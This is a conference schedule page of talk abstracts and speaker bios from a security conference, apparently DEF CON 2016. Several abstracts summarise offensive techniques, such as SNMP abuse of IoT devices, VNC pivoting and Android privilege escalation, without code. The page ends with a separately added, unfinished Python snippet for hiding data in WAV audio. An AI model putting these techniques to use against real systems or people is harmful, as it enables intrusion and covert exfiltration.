It's recently become easier and less expensive to create malicious GSM Base Transceiver Station (BTS) devices, capable of intercepting and recording phone and SMS traffic. Detection methods haven't evolved to be as fast and easy to implement. Wireless situational awareness has a number of challenges. Categorically, these challenges are usually classified under Time, Money, or a lot of both. Provisioning sensors takes time, and the fast stuff usually isn't cheap. Iterative improvements compound the problem when you need to get software updates to multiple devices in the field. I'll present a prototype platform for GSM anomaly detection (called SITCH) which uses cloud-delivered services to elegantly deploy, manage, and coordinate the information from many independent wireless telemetry sensors (IoT FTW). We'll talk about options and trade-offs when selecting sensor hardware, securing your sensors, using cloud services for orchestrating firmware, and how to collect and make sense of the data you've amassed. Source code for the prototype will be released as well. The target audience for this lecture is the hacker/tinkerer type with strong systems and network experience. A very basic understanding of GSM networks is a plus, but not required.
Ashmastaflash is a native of southeast Tennessee and a recent transplant to San Francisco. He entered the security domain through systems and network engineering, spent a number of years in network security tooling and integration, and currently works in R&D for CloudPassage.
Return to Index
DEFCON - Track One - Saturday - 13:00-13:59
Six Degrees of Domain Admin - Using Graph Theory to Accelerate Red Team Operations
Andy Robbins (@_wald0),
Offensive Network Services Team Lead, Veris Group
Rohan Vazarkar (@cptjesus) Penetration Tester, Veris Group
Will Schroeder (@harmj0y) Researcher, Veris Group
Active Directory domain privilege escalation is a critical component of most penetration tests and red team assessments, but standard methodology dictates a manual and often tedious process – gather credentials, analyze new systems we now have admin rights on, pivot, and repeat until we reach our objective. Then -- and only then -- we can look back and see the path we took in its entirety. But that may not be the only, nor shortest path we could have taken. By combining our concept of derivative admin (the chaining or linking of administrative rights), existing tools, and graph theory, we can reveal the hidden and unintended relationships in Active Directory domains.
Bob is an admin on Steve’s system, and Steve is an admin on Mary’s system; therefore, Bob is effectively (and perhaps unintentionally) an admin on Mary’s system. While existing tools such as Nmap, PowerView, CrackMapExec, and others can gather much of the information needed to find these paths, graph theory is the missing link that gives us the power to find hidden relationships in this offensive data. The application of graph theory to an Active Directory domain offers several advantages to attackers and defenders. Otherwise invisible, high-level organizational relationships are exposed. All possible escalation paths can be efficiently and swiftly identified. Simplified data aggregation accelerates blue and red team analysis. Graph theory has the power and the potential to dramatically change the way you think about and approach Active Directory domain security.
Andy Robbins is the Offensive Network Services lead for Veris Group's Adaptive Threat Division. He has performed penetration tests and red team assessments for a number of Fortune 500 commercial clients and major U.S. Government agencies. In addition, Andy researched and presented findings related to a business logic flaw with certain processes around handling ACH files affecting thousands of banking institutions around the country at DerbyCon. He has a passion for offensive development and red team tradecraft, and helps to develop and teach the ‘Adaptive Red Team Tactics’ course at BlackHat USA.
Twitter: @_wald0
Rohan Vazarkar is a penetration tester and red teamer for Veris Group's Adaptive Threat Division, where he helps assess fortune 500 companies and a variety of government agencies. Rohan has a passion for offensive development and tradecraft, contributing heavily to EyeWitness and the EmPyre projects. He has presented at BSides DC, and helps to develop and teach the ‘Adaptive Penetration Testing’ course at BlackHat USA.
Twitter: @cptjesus
Will Schroeder is security researcher and red teamer for Veris Group's Adaptive Threat Division. He is a co-founder of the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a co-founder and core developer of the PowerShell post-exploitation agent Empire. He has presented at a number of security conferences on topics spanning AV-evasion, post-exploitation, red team tradecraft, and offensive PowerShell.
Twitter: @harmj0y
Return to Index
DEFCON - Track Two - Friday - 17:00-17:59
Sk3wlDbg: Emulating All (well many) of the Things with Ida
Chris Eagle sk3wl 0f fucking r00t
It is not uncommon that a software reverse engineer finds themselves desiring to execute a bit of code they are studying in order to better understand that code, or alternatively to have that code perform some bit of useful work related to the reverse engineering task at hand. This generally requires access to an execution environment capable of supporting the machine code being studied, both at an architectural level (CPU type) and a packaging level (file container type). Unfortunately, this is not always a simple matter. The majority of analysts do not have a full complement of hosts available to support a wide variety of architectures, and virtualization opportunities for non-Intel platforms are limited. In this talk we will discuss a lightweight emulator framework for the IDA Pro disassembler that is based on the Unicorn emulation engine. The goal of the project is to provide an embedded multi-architectural emulation capability to complement IDA Pro's multi-architectural disassembly capability, enhancing the versatility of one of the most common reverse engineering tools in use today.
Chris Eagle is a registered hex offender. He has been taking software apart since he first learned to put it together over 35 years ago. His research interests include computer network operations, malware analysis and reverse/anti-reverse engineering techniques. He is the author of The IDA Pro Book and has published a number of well-known IDA plug-ins. He is also a co-author of Gray Hat Hacking. He has spoken at numerous conferences including Black Hat, DEF CON, Shmoocon, and ToorCon. Chris also organized and led the Sk3wl of r00t to two DEF CON Capture the Flag championships and produced that competition for four years as part of the DDTEK organization.
Twitter: @sk3wl
Return to Index
SkyTalks - Skyview 3 - Friday - 18:00-18:59
Speaker: Rick Glass
Talk: Slack as Intelligence Collector or how anime cons get weird
Slack, and other apps like it, are currently advertised as ways for corporate teams to communicate more effectively. However, with minimal effort, it can also be used as a quick and dirty way to catalog mugshots and gather collected intel from disparate sources. In this talk, I show you how this was done at an anime con. Horror stories about anime cons encouraged.
Return to Index
Wireless - Skyview 1 - Saturday - 12:00-12:20
Gabriel Ryan
Bio
Gabriel is a pentester, CTF player, and Python junkie. He currently works as a Security Engineer at Gotham Digital Science. He also leads wireless security for the BSides Las Vegas NOC team. Previously he has worked for OGSystems and Rutgers University. Things that make him excited include wireless security, software defined radio, and playing with fire. In his spare time, he enjoys live music and riding motorcycles.
@s0lst1c3
Slaying Rogue Access Points with Python and Cheap Hardware
Abstract
Evil Twin and Karma attacks are both highly effective methods through which shady people can pluck your credentials from thin air. Although progress has been made in preventing these attacks, most existing solutions are expensive and only available to enterprise customers.
Fortunately, it turns out that it's actually much simpler to write tools that stop these kinds of attacks than it is to build tools to carry them out. This talk will demonstrate how to use Python, a punk rock DIY mindset, and cheap commodity hardware to detect and mitigate Evil Twin and Karma attacks.
We'll also explore the limitations of these protective methods, as well as offensive techniques to exploit these weaknesses that have yet to be addressed.
Return to Index
DEFCON - Track Two - Friday - 15:00-15:59
Slouching Towards Utopia: The State of the Internet Dream
Jennifer S. Granick Director of Civil Liberties, Stanford Center for Internet and Society
Is the Internet going to live up to its promise as the greatest force for individual freedom that the world has ever known? Or is the hope for a global community of creative intellectual interaction lost…for now?
In last year's Black Hat keynote, entitled "Lifecycle of a Revolution," noted privacy and civil liberties advocate Jennifer Granick told the story of the Internet utopians, people who believed that Internet technology could greatly enhance creative and intellectual freedom. Granick argued that this Dream of Internet Freedom was dying, choked off by market and government forces of centralization, regulation, and globalization. The speech was extremely popular. Almost 8000 people watched it at Black Hat. It was retweeted, watched and read by tens of thousands of people. Boing Boing called it "the speech that won Black Hat (and DEF CON)."
This year, Granick revisits the state of the Internet Dream. This year’s crypto war developments in the U.S. and U.K. show governments’ efforts to control the design of technologies to ensure surveillance. The developments also show that governments see app stores as a choke point for regulation and control, something that couldn’t easily happen with general purpose computers and laptops but which could be quite effective in a world where most people access the network with mobile devices.
Also in the past year, the European Court of Justice embraced blocking orders and ISP liability in the name of stopping copyright infringement, privacy violations, and unflattering comments from ever being published online. The effect of these developments is to force Internet companies to be global censors on the side of online civility against the free flow of information and opinion. If we want to realize some of the promise of the Internet utopian vision, we are going to have to make some hard political choices and redesign communications technology accordingly. The future could look a lot like TV, or we could work to ensure our technology enshrines individual liberties. This talk will help attendees join that effort.
In 1995, Jennifer Granick attended her first DEF CON at the Tropicana Hotel. Since then, she has defended hackers and coders in computer crime, copyright, DMCA and other cases. Jennifer left her criminal law practice in 2001 to help start the Stanford Center for Internet and Society (CIS). From 2001 to 2007, Jennifer was Executive Director of CIS and taught Cyberlaw, Computer Crime Law, Internet intermediary liability, and Internet law and policy. From 2008 to 2010, Jennifer worked with the boutique firm of Zwillgen PLLC and as Civil Liberties Director at the Electronic Frontier Foundation. Today, Jennifer has returned to CIS as Director of Civil Liberties. She teaches, practices, speaks, and writes about computer crime and security, electronic surveillance, technology, privacy, and civil liberties. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of Florida.
Twitter: @granick
Medium
Center for Internet and Society
Just Security
Return to Index
IOT - Bronze 1 - Saturday - 13:00-13:50
SNMP and IoT Devices: Let me Manage that for you Bro!
Bertin Bervis
In this talk I'm going to cover the basics of how SNMP works and how we can use it to take control over several IoT devices with R/W permissions remotely. We are going to abuse the bad configuration issue in order to turn on/off traffic light systems, and discover ATMs, power supplies, and several kinds of industrial equipment.
I'm also going to demonstrate how a remote attacker can retrieve the password of networking devices like Huawei and Cisco equipment.
Several devices are exposed on the public internet running SNMP agents with R/W permissions. This talk is going to cover how bad management could lead to a potential attack in the IoT field with bad consequences in real life. The talk is for hackers, network engineers, security researchers and people concerned about security in the IoT field.
Bertin Bervis is a security researcher from San Jose, Costa Rica. He is the co-founder of the NetDB project, a certificate/fingerprint device search engine, and he has been a speaker at several technical security conferences like DEFCON and, in Latin America, EKOPARTY, DragonJar and the OWASP Latin tour. Formerly he was a network engineer and software developer.
Return to Index
DEFCON - DEF CON 101 - Sunday - 12:00-12:59
So You Think You Want To Be a Penetration Tester
Anch Hacker
So, you think you want to be a penetration tester, or you already are one and don't understand the difference between you and all the other "so called" penetration testers out there. Think you know the difference between a Red Team, a Penetration Test and a Vulnerability Assessment? Know how to write a report your clients will actually read and understand? Can you leverage the strengths of your team mates to get through tough roadblocks, migrate, pivot, pwn and pillage? No? Well, this talk is probably for you then! We will go through the fascinating, intense and often crazily boring on-site assessment process, talk about planning and performing Red Teams, how they are different, and why they can be super effective, and have some fun along the way. I'll tell you stories that will melt your face, brain and everything in between, give you the answers to all of the questions you never knew you had, and probably make you question your life choices. By the end of this session you will be ready to take your next steps into the job you've always wanted, or know deep inside that you should probably look for something else. There will be no judgment or shame, only information, laughter and fun.
Anch currently works on a Red Team for an agency with a 3 letter acronym. It's not secret squirrel or hush hush; he just doesn't like to talk about himself very much. He has 15 years of experience in penetration testing and cyber security with a background in control systems and security architecture.
Twitter: @boneheadsanon
Return to Index
CPV - Bronze 1 - Saturday - 11:00-12:00
Talk Title:
SSL Visibility, Uncovered
Speaker Name, Employer or position:
Andrew Brandt - Director of Threat Research at Blue Coat Systems
Abstract:
Blue Coat Systems is a large network and cloud security company who counts many of the world's most important companies as its clients. Among its product offerings are a range of appliances collectively called the Advanced Threat Protection suite, which include a standalone SSL man-in-the-middle decryption device known as SSL Visibility (SSL-V). Both the company and this particular product have been much maligned, but SSL-V has become a vital and important tool in the incident responder kit. This presentation will attempt to bring clarity to the many misconceptions about SSL Visibility, including how it works, what it can and can't do, and why SSL-V isn't as scary as some people make it out to be.
Bio:
Andrew Brandt (Spike) is the Director of Threat Research at Blue Coat Systems. He is a former editor and columnist for a large consumer tech publication and Internet privacy expert who found his way into the world of malware analysis and network forensics from investigative journalism. In his day job, he infects computers with malware in order to observe their behavior and retrospectively learn about the communications methods and control networks criminals use to manage infected hosts.
Social media links if provided:
@threatresearch
Return to Index
BHV - Skyview 4 - Saturday - 15:30-15:59
Speaker: Chris Frenz
About Chris Frenz:
Christopher Frenz is an expert on healthcare security and privacy. He is the author of the books "Visual Basic and Visual Basic .NET for Scientists and Engineers" and "Pro Perl Parsing," as well as the author of numerous articles on security related topics. He is an active member of the security community and the project lead for the OWASP Anti-Ransomware Guide and OWASP Secure Medical Device Deployment Standard projects. Frenz holds many industry standard certifications, including CISSP, HCISPP, CISM, CISA, CIPP/US, CIPM, CIPT, and CCSK.
Abstract:
In recent months it seems like not a week passes where you do not encounter a headline stating that a healthcare organization has been held for ransom or in some other way involved in a breach. Healthcare has been a sector that has routinely been described as being lax with the implementation and enforcement of information security controls, and the challenges faced by healthcare organizations are growing as attackers begin to look past EHR and PACS systems and target the medical devices within them. That older but still very functional computerized medical supply cabinet which was installed to improve the efficiency of operations can now be seen as a liability in that its aging control node may contain hundreds of unpatched vulnerabilities: vulnerabilities that, in the case of malware like Medjack, can be used to compromise the device and use it as a staging ground for attacks against other hospital systems. In some cases, however, the risk goes beyond just a breach vector and can directly impact human life. What if that infusion pump's dosage was illegitimately changed or the pacemaker programming made malicious? What if Brickerbot took out a surgical robot or a heart monitor at a critical time? These issues could readily give a whole new meaning to the term Denial of Service and cannot be ignored. While the FDA recently issued some guidance for the manufacturers of such devices, the secure deployment of such devices is also critical, as all of the security features in the world are useless if no one turns them on or if they are configured improperly. This presentation will discuss the OWASP Secure Medical Device Deployment Standard and requisite methods that can be used to securely deploy medical devices in order to help prevent their compromise as well as mitigate the damage that can occur if a successful compromise were to occur.
Return to Index
DEFCON - Track Two - Saturday - 12:00-12:59
Stargate: Pivoting Through VNC to Own Internal Networks
Yonathan Klijnsma Senior Threat Intelligence Analyst, Fox-IT
Dan Tentler (Viss) Founder, Phobos Group
VNC is a great tool to use if you need to get to a box you're not physically near. The trouble with VNC is that it was invented 15+ years ago and hasn't been improved upon in any significant way. Besides the internet of things being sprinkled with VNC endpoints, there are companies which use VNC to such a large degree they need a VNC proxy on their perimeter to get to all the internal VNC hosts - some of which are ICS/SCADA devices. Stargate is the result of discovering a vulnerability in these VNC proxies that allows you to proxy basically anything. This allows you to do anything from using them as anonymous proxies, conduct reflective scanning, pivoting into the internal network behind it, and more. In this presentation we will show you exactly what Stargate is, how we encountered it, the 'fun' things you can do with the Stargates all around the globe and we will release the Stargate tool which anyone can use to talk to/through these devices.
Yonathan Klijnsma is a senior threat intelligence analyst working for Fox-IT, a Dutch IT security company. Yonathan specializes in the analysis and tracking of attack campaigns, work out the attacker profiles and investigate the techniques and tools used by attackers. Yonathan's area of focus lies in the espionage related cases. Outside of work Yonathan likes taking things apart and figuring out how they work; be it physical devices or digital like malware or ransomware. Occasionally a write-up of one of these projects ends up on his personal blog.
Dan Tentler is the founder and CEO of The Phobos Group, a boutique information security services company. Previously a co-founder of Carbon Dynamics, and a security freelancer under the Aten Labs moniker, Dan has found himself in a wide array of different environments, ranging from blue team, to red team, to purple team, to ‘evil hacker for a camera crew’. When not obtaining shells or explaining how not to get shelled, Dan enjoys FPV racing, homebrewing, and internet troublemaking.
Return to Index
CPV - Bronze 2 - Friday - 18:00-18:30
Talk Title:
State of the Curve - 2016
Speaker Name, Employer or position:
Deirdre Connolly - Senior Software Engineer at Brightcove
Abstract:
There's been a lot happening in the world of elliptic curve cryptography lately: new IETF-approved curves for use in protocols like TLS, Juniper's Dual_EC_DRBG getting its points swapped in the wild, and new advances in isogeny-based crypto that may keep some form of ECC alive in a post-quantum world. In this talk we'll touch on these topics as we get a broad look at the current state of curves in modern cryptography.
Bio:
Deirdre Connolly is a self-taught cryptography enthusiast and a senior software engineer at Brightcove, where she drives application security. She has a BS in Electrical Engineering and Computer Science from MIT.
Social media links if provided:
@durumcrustulum
Return to Index
DEFCON - DEF CON 101 - Saturday - 17:00-17:59
Sticky Keys To The Kingdom: Pre-auth RCE Is More Common Than You Think
Dennis Maldonado (AKA Linuz) Security Consultant - LARES Consulting
Medic (Tim McGuffin) Security Consultant - LARES Consulting
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not thousands, of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no, this is not even a new technique. No super fancy website with a poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
Dennis Maldonado is a Security Consultant at LARES Consulting. His current work includes penetration testing, infrastructure assessments, red teaming, and security research. Dennis’ focus is encompassing all forms of information security into an assessment in order to better simulate a real world attack against systems and infrastructure. As a security researcher and evangelist, Dennis spends his time sharing what he knows about Information Security with anyone willing to learn. Dennis is a returning speaker to DEF CON and has presented at numerous workshops and meet-ups in the Houston area. Dennis co-founded Houston Locksport in Houston, Texas, where he shares his love for lock-picking and physical security, as well as Houston Area Hackers Anonymous (HAHA), a meet-up for hackers and InfoSec professionals in the Houston area.
Twitter: @DennisMald
Tim was voted "most likely to be indicted" by his high school senior class, but has since gone on to gain the trust of large organizations and their executive management, which may or may not be a good thing. He holds a few industry certifications and is a member of a few security organizations, but considers his insomnia and attention deficit problems far more important to his career.
Twitter: @NotMedic
Return to Index
DEFCON - Track One - Sunday - 15:00-15:59
Stumping the Mobile Chipset
Adam Donenfeld Senior Security Researcher, Check Point
Following recent security issues discovered in Android, Google made a number of changes to tighten security across its fragmented landscape. However, Google is not alone in the struggle to keep Android safe. Qualcomm, a supplier of 80% of the chipsets in the Android ecosystem, has almost as much effect on Android’s security as Google. With this in mind, we decided to examine Qualcomm’s code in Android devices. During our research, we found multiple privilege escalation vulnerabilities in multiple different subsystems introduced by Qualcomm into all its Android devices. In this presentation we will review not only the privilege escalation vulnerabilities we found, but also demonstrate and present a detailed exploitation, overcoming all the existing mitigations in Android’s Linux kernel to run kernel-code, elevating privileges and thus gaining root privileges and completely bypassing SELinux.
Adam Donenfeld is a lead mobile security researcher at Check Point with vast experience in the mobile research field. From a young age he has been hacking and reverse engineering for fun and profit. Prior to Check Point Adam served in an Israeli elite intelligence unit, as a security researcher. In his free time, Adam studies German.
Return to Index
CPV - Bronze 2 - Friday - 10:30-11:00
Talk Title:
Tabletop Cryptography
Speaker Name, Employer or position:
nibb13
Abstract:
A basic understanding of cyphers and cryptography is part of a solid foundation for anyone in the InfoSec field. Today we use crypto without much second thought, but cryptography, or the use of ciphers and codes to protect secrets, has been around for thousands of years. Until the early 20th century, encryption was done with pen and paper or simple mechanical devices. My Tabletop Cryptography talk is about the history of cryptography and cryptanalysis as well as fun with examples of crypto-puzzles that can all be completed without the use of modern infernal computing devices.
Bio:
Husband, father, infosec geek
Social media links if provided:
@nibb13
Return to Index
Workshops - Las Vegas Ballroom 4 - Saturday - 10:00-14:00
Taking a bite out of Apple
John Poulin Principal Application Security Consultant, nVisium
This workshop will provide a solid introduction to the concepts of iOS application security from a black-box perspective. Students will learn concepts relating to assessing the security of iOS applications. In this course we will use real-world examples from the Apple App Store in contrast with several intentionally vulnerable examples. Students are expected to have little to no experience.
John Poulin is a principal application security consultant for nVisium who specializes in web and mobile application security. He worked previously as a web developer and software engineer. When he's not hacking on apps, John spends his time building tools to help him hack on web apps!
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: Mac OS X w/ XCode. Jailbroken physical devices are recommended.
Return to Index
SkyTalks - Skyview 3 - Saturday - 18:00-18:59
Speaker: Phax
Talk: Taking Down Skynet (By Subverting the Command and Control Channel)
The only hope humanity has to resist the oncoming bot invasion and restructuring of the global order is to co-opt the command and control channel (the government of the United States and the Military Industrial Complex)
Return to Index
BHV - Skyview 4 - Friday - 13:00-13:59
Speaker: Kevin Sacco
About Kevin
Kevin is a healthcare threat hunter and has been conducting ethical hacking since the time when wardialing and sitting in hot vans all day with a bazooka (not Joe's gum) to do wardriving was in vogue. He has over 16 years' experience in IT security and compliance ranging from active duty service in the US military, Big 4 consulting, compliance management at a large tech company and more recently healthcare-focused consulting - where he has led and conducted more than 50 hacking engagements in the past 3 years. Kevin is the coauthor of a whitepaper on "Hacking Healthcare" and has assisted the Office of Civil Rights on a study to advise and guide the government on hacking in healthcare. In his spare time - Kevin is trained in and enjoys experimenting with and working with people in various forms of cutting edge psychology and diet and nutrition approaches to maximize human potential.
Abstract:
Over the past decade, electronic medical records (EMRs) and networked medical devices have become a healthcare norm. However, vendors and consumers alike have not paid sufficient attention to the security implications of EMRs and networked medical devices. In this talk, I will cover my experience [ethical] hacking and social engineering my way into healthcare networks. I will highlight security issues with healthcare networks and share real life stories.
Return to Index
SkyTalks - Skyview 3 - Saturday - 15:00-15:59
Speaker: Vincent Canfield
Talk: Tales from the Dongosphere: Lessons Learned Hosting Public E-mail for 4chan
In 2015, a malicious user sent an anonymous E-mail through my service threatening violence against schools in Los Angeles and New York. As a result, all schools in Los Angeles were closed, 610,000 students stayed home, and 1500 schools were combed through by SWAT teams for bombs that weren't there. Because I was the only public figure involved, I faced an incredible amount of heat from the media, governments, and the public.
It hasn't been that bad, though. Since 2013, I have been hosting anonymous, Tor-friendly E-mail @cock.li, @8chan.co, and several other domains for anyone who wants them. In this talk I candidly talk about the people I've met, the shit I've faced, and the lessons I've learned from hosting E-mail for 4chan.
Return to Index
IOT - Bronze 4 - Friday - 11:30-11:59
TBA - Paul Dant
No description available
Return to Index
BHV - Skyview 4 - Friday - 18:00-18:59
Speakers: Darren and Jen
About Darren and Jen:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the Oxford comma.
Darren Lawless is a security analyst with 13+ years of plugging dykes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple years resulting in forays, experimentation, and investigation into nootropics, biofeedback, and augmentation, implantation, brain stimulation, and a sundry wet-tech bad-assedness. Still a squire in the realm, he maintains the ability to ask real world questions like, "Why (why not) do this? What are the risks? Should we care?"
Abstract:
Are you interested in experimenting with tDCS but don't want to pay a high price for commercial devices? Are you a maker and tinkerer at heart? If so, then this workshop is for you. Join us as we walk you through the process of DIYing your very own tDCS device. Donations for kits appreciated ($10 or whatever you like)
Return to Index
BHV - Skyview 4 - Saturday - 15:30-15:59
Speaker: Christian Dameff
@cdameffmd
About Christian Dameff:
Christian (quaddi) Dameff MD is an Emergency Medicine doctor, former open capture the flag champion, prior Defcon speaker, bioethicist, and researcher. Published works include topics such as therapeutic hypothermia after cardiac arrest, novel drug targets for myocardial infarction patients, and other Emergency Medicine related works with an emphasis on CPR optimization. His most recent focus is on biohacking, medical device security, and critical medical infrastructure cyber security. He can’t spell words well. This is his twelfth Defcon.
Abstract:
As biohackers continue to rip through the red tape and uncover the future of humanity in basements all across the globe, ethical discussion regarding self-experimentation, genetic manipulation, definitions of humanity, and other hugely important issues are central to an effective biohacking future. Join two biohacking physician ethicists on a journey filled with biohacking dilemmas, medical correlates, and poorly executed puns.
Return to Index
BHV - Skyview 4 - Friday - 12:00-12:59
Speaker: Keoni Gandall
About Keoni:
Keoni Gandall is an 18-year-old biohacker who frequents DIYbio forums under the alias "Koeng". He worked at UCI for 4 years in a directed evolution lab. Likes DNA, BSD, and freedom.
Abstract:
The ultimate form of information storage: DNA.
Dumb question: Can we store Bitcoin addresses in DNA?
Participate in several challenges demystifying the idea of storing Bitcoins inside of DNA. The first who discovers the solution to each challenge wins the satoshi stored in the actual DNA code.
Return to Index
BHV - Skyview 4 - Saturday - 17:00-17:59
Speaker: Jun Axup
About Jun Axup:
Jun Axup is the Science Director at IndieBio. She has a PhD in chemical biology and worked in various startups in immuno-oncology, lab automation robotics, CRISPR, and precision medicine. Jun is passionate about using the intersection of biology, technology, and design to increase human healthspan.
Abstract:
Biotech companies have historically been started by professors from prestigious institutions with millions of dollars of investment funding. Today, with the lowering cost of research and increasing amount of resources driven by Moore's law, robotics, software and efficiencies in bioproduction, anyone with an insight can start a biotech company for a fraction of the cost, be they PhD or biohacker.
At IndieBio, the world's largest biotech accelerator, started just under 3 years ago, we've funded and helped founders build 70 companies that redefine speed and innovation for biology. We have trained graduate students and first-time founders into entrepreneurs and have expanded biotechnology beyond therapeutics and medical devices. We see biology as the next big technology platform with applications in food, regenerative medicine, consumer products, neurotech, and bio-IT interfacing. Come hear about the big problems our companies are solving with biology as technology!
Return to Index
BHV - Skyview 4 - Saturday - 17:30-17:59
Speaker: Randall Alley
About Randall Alley:
Randall Alley is CEO and Chief Prosthetist for biodesigns inc., a Southern California prosthetic facility and R&D center specializing in upper and lower limb interface (socket) systems for patients of all ages and activity levels.
Our biomechanically focused, proprietary interface designs result in improved outcomes and greater patient acceptance and are backed by evidence-based clinical support. In conjunction with his practice, Alley has worked with DEKA Research and Development as their prosthetic interface design consultant for the Defense Advanced Research Projects Agency’s (DARPA) “Revolutionizing Prosthetics Project” chartered to develop the next generation of military upper limb prosthesis (a.k.a. the “Luke Arm”). Randy is currently the Principal Investigator on biodesigns’ own DARPA/SBIR Phase II contract.
Abstract:
Very often amputees, prosthetists, manufacturers and particularly the general public are all excited to hear about the latest developments in prosthetic components such as feet, ankles, knees and hands. And while these components have improved significantly over the last decade, there is one area that has essentially been overlooked. And it’s an area that is arguably the most critical in terms of an individual’s comfort, control, proprioception, and overall health. I am of course talking about the prosthetic socket, or interface. The socket is universal to all upper & lower limb prosthetic systems and without it, prosthetic systems simply would not exist. Today nearly all prosthetic wearers are in sockets that provide limited biomechanical control and therefore outcomes are sub-par at best. Common wearer complaints include poor socket fit, inability for it to stay on or to be worn for long periods of time, excessive heat, skin irritations, and poor performance, among others.
This presentation will highlight the biomechanical differences of traditional sockets that merely encapsulate a residual limb to that of the High-Fidelity™ (HiFi) Interface that uses skeletal capture and control principles that result in increased comfort, increased performance, a trend toward gait symmetry, as well as improved range of motion, energy efficiency and overall user success. Perhaps the most interesting development resulting from osseostabilization is enhanced connectivity and proprioception. By mimicking the motions of the skeleton it is believed we are in effect “fooling” the brain into believing the lost arm or leg is back, a key component in the process of becoming whole again.
Return to Index
Wireless - Skyview 1 - Friday - 15:00-15:30
Rushikesh D. Nandedkar
Bio
Rushikesh is a security analyst. Having more than six years of experience under his belt, his assignments have always been pointed towards reducing the state of insecurity for information. His research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014 and BruCON 2015. Being an avid CTF player, for him solace is messing with packets, frames and shell codes.
@nandedkarhrishi
Amrita C. Iyer
Bio
Amrita is a test analyst by profession. Having spent substantial time in the development life cycle of a wide array of applications, she has earned a flair for agile approaches to testing. A telecom engineer, she blends network, security and testing in the perfect mold for her day to day work and passion. Her research papers were accepted at NCACNS 2013, nullcon 2014, HITCON 2014, Defcamp 2014 and BruCON 2015.
@amritaciyer
The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */
Abstract
In this talk we will be sharing an approach to ship data over broadcast frames. We purposely opted for broadcast frames, e.g. beacon frames, probe requests etc., because of their obviously higher rate of availability with no mandate of authentication and hence the lower possibility of suspicion raised against their existence in the local radio periphery. For shipping data in the fields other than the payload field, we considered certain information elements such as SSID, DSset, TIM, Rates, ESRates, initialization vector, FHset, CFset, IBSSset, challenge, ERPinfo, QoS Capability, RSNinfo, vendor, challenge text, extended support rate, TPC report etc. We achieved nice results with probe request.
Return to Index
BHV - Skyview 4 - Saturday - 16:00-16:59
Speaker: Edward You
About Edward You:
Bio pending.
Abstract:
Big Data analytics is a rapidly growing field that promises to dramatically change the delivery of services in sectors as diverse as consumer products and healthcare. Big Data analytics also have the potential to enable deeper insight into complex scientific problems in the human condition by leveraging ever-increasing stores of knowledge coupled with ever-improving processing capabilities. These beneficial aspects of Big Data have been well-documented and widely touted. However, less attention has been paid to the possible risks associated with these technologies beyond issues related to privacy. In the hopes of sparking discussion and identifying paths forward to better safeguard the life, the FBI presentation will address some of the theoretical risks ranging from vulnerabilities of datasets to cyber intrusion and the potential malicious use of the integration and analysis of Big Data in the life sciences.
Return to Index
BHV - Skyview 4 - Sunday - 11:05-11:59
Speaker: Paul Ashley
About Paul Ashley:
Paul Ashley is Chief Technology Officer at Anonyome Labs, a startup company focused on identity obfuscation through building of fake identities. The company brings technology to every day users that allow them to interact online and offline in safety, privacy and control. Paul’s responsibilities at Anonyome Labs includes application architecture, development, emerging technologies, curating the patent portfolio, and technical partnerships.
Abstract:
In a world filled with danger emanating from all sorts of digital channels, having a proxy (or two) that you create, control, manage and direct is not just useful, but a requirement. Instead of worrying about an ineffectual government or an incomprehensible privacy policy, it’s possible that fake identities are a way to take ownership of the problem. Fake identities in the hands of the individual, are the way to swing the pendulum of privacy back to the people. The presentation will present our progress at building tools for people to implement fake identities to use offline and online. At the time of writing this abstract our users have 2 million active fake identities and the number is growing daily. These identities are used for dating, shopping, selling, social media, political statements and for numerous other uses.
Return to Index
Workshops - Las Vegas Ballroom 5 - Thursday - 10:00-14:00
The in’s and out’s of Steganography
Chuck Easttom Computer Scientist
The class will start with an overview of basic steganography and a history. Now this part is probably common knowledge to many attendees. But then we will delve into specific tools including hiding data in wav files. We will also explore forensic techniques to detect steganography. Then we will look at cutting edge new steganography techniques. One of my 6 patents is for distributed steganography so that will be one of the new techniques we will explore. Finally, the training will culminate with reviewing actual source code that does steganography. Attendees will get the working source code to take with them. The idea is to start with basics that probably over 3/4 of attendees know and then move deeper into topics most people don’t know. That way everyone can benefit from the workshop, both novices and experts.
Chuck Easttom has been in the IT industry for over 25 years and training for over 15. He has two master's degrees and holds 40 industry certifications. He is the author of 20 computer science books and an inventor with 7 patented inventions (including a steganography invention). He travels around the world teaching computer security and speaking on security-related topics. He has conducted computer security training for a wide range of law enforcement officers, various companies, and a variety of government agencies from around the world.
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: If they bring a laptop they can do hands on.
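As an added example of the WAV technique and the detection angle the workshop mentions (constructed here, not the workshop's source code): LSB embedding into 16-bit PCM with a length prefix, the matching extractor, and a crude first-order statistic that flags the embedding on this synthetic cover. The cover is a generated low-amplitude tone, the payload is made up, and the detector only shows why the LSB plane of audio is compared against what the cover would naturally produce.

```python
import io
import math
import struct
import wave


def make_cover_wav(n_frames=16000, sample_rate=8000):
    """Constructed cover: 16-bit mono, a slow 1 Hz sine at low amplitude (not a real recording)."""
    samples = [int(200 * math.sin(2 * math.pi * 1.0 * i / sample_rate)) for i in range(n_frames)]
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(sample_rate)
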